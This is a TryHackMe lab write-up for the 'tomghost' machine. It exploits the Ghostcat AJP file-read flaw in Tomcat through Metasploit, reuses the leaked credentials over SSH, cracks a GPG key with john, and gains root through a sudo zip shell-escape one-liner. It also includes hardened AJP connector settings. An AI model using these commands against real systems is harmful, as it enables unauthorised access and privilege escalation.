TryHackMe - tomghost - Write Up

Link to THM Room

Task 1

Task 1.1

» Compromise this machine and obtain user.txt

Prep:

root@ip-10-10-48-72:~# export ip=10.10.50.105
root@ip-10-10-48-72:~# echo $ip

Enumerate services with nmap

root@ip-10-10-48-72:~# sudo nmap -sSVC -n -O -T4 -A $ip

  -sS  TCP SYN scan
  -sV  Probe open ports to determine service and version information
  -sC  Run the default scripts
  -n   No DNS resolution
  -O   OS detection
  -T4  Timing template: speed of the scan and the noise it makes (0 slowest and quietest, 5 fastest and loudest)
  -A   Aggressive scan (OS detection, version detection, script scanning and traceroute)

Result

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
MAC Address: 02:23:E0:7A:4A:53 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
[...]

There are some interesting ports.

Opening $ip:8080 in a browser presents us with the default Tomcat page. Some information is visible there, like the path $CATALINA_HOME/conf/tomcat-users.xml. It might come in handy later.

I looked into Metasploit and found something called tomcat_ghostcat - well, looks familiar.

$ msfconsole

msf6 > search ajp

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  Yes    Apache Tomcat AJP File Read

Let us use it, with the following msf commands:

msf6 > use 0
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 10.10.50.105
RHOSTS => 10.10.50.105
msf6 auxiliary(admin/http/tomcat_ghostcat) > run

Result

[*] Running module against 10.10.50.105
[...]
  <description>
     Welcome to GhostCat
	skyfuck:*****************
  </description>

</web-app>

Some credentials! Let’s try to log into SSH!
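The file read above works because Tomcat 9.0.30 ships its AJP connector listening on every interface with no shared secret. As an added note that is not part of the original write-up, here is that connector line from server.xml next to a hardened form; it assumes Tomcat 9.0.31 or later (where secretRequired and secret were introduced) and the secret value is a placeholder.

```xml
<!-- Weak: the default shipped up to Tomcat 9.0.30. No address restriction, no secret,
     so any host that can reach port 8009 can speak AJP to Tomcat directly. -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

<!-- Hardened: bind the connector to loopback and require a shared secret that the
     reverse proxy in front of Tomcat must present on every AJP request. -->
<Connector port="8009" protocol="AJP/1.3"
           address="127.0.0.1"
           secretRequired="true"
           secret="REPLACE-WITH-LONG-RANDOM-SECRET"
           redirectPort="8443" />

<!-- If nothing in front of Tomcat speaks AJP at all, delete the connector and
     keep only the HTTP/HTTPS connectors (8080/8443). -->
```

On 9.0.30 itself the two secret attributes are not recognised, so the fix there is to upgrade or to comment the connector out; re-running the nmap scan from the start of the write-up should then no longer list 8009 as open from the outside.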

root@ip-10-10-48-72:~# ssh skyfuck@$ip
[...]
skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc
skyfuck@ubuntu:~$ 

And we don’t have to look far. A private key and something to decrypt.

Get the files over to the attacking machine with scp (run from the attacking machine):

scp skyfuck@$ip:/home/skyfuck/* .

Create a crackable hash from the key with gpg2john and crack it with john.

root@ip-10-10-48-72:~# gpg2john tryhackme.asc > hashofkey

root@ip-10-10-48-72:~# cat hashofkey 
tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <stuxnet@tryhackme.com>::tryhackme.asc
root@ip-10-10-48-72:~# john --wordlist=/usr/share/wordlists/rockyou.txt hashofkey
[...]
Press 'q' or Ctrl-C to abort, almost any other key for status
**********        (tryhackme)
1g 0:00:00:00 DONE (2024-02-20 17:16) 5.882g/s 6305p/s 6305c/s 6305C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Let us decrypt credential.pgp: first import the (now unlocked) key, then decrypt.

root@ip-10-10-48-72:~# gpg --import tryhackme.asc
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 8F3DA3DEC6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
root@ip-10-10-48-72:~# gpg --decrypt credential.pgp
gpg: WARNING: cypher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:*****************************************************************

And more credentials - SSH yet again.

root@ip-10-10-48-72:~# ssh merlin@$ip
merlin@10.10.50.105's password: 

[...]

merlin@ubuntu:~$ ls
user.txt

merlin@ubuntu:~$ cat user.txt 
***{*****************}

Task 1.2

» Escalate privileges and obtain root.txt

Let us check what we can do:

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ 

Let’s hop over to https://gtfobins.github.io and see what we can do with zip.

Some ‘brute-forcing’ later and I got in with:

merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# whoami
root

Getting the flag.

# cd /root/
# ls
root.txt  ufw
# cat ./root.txt
***{*********}
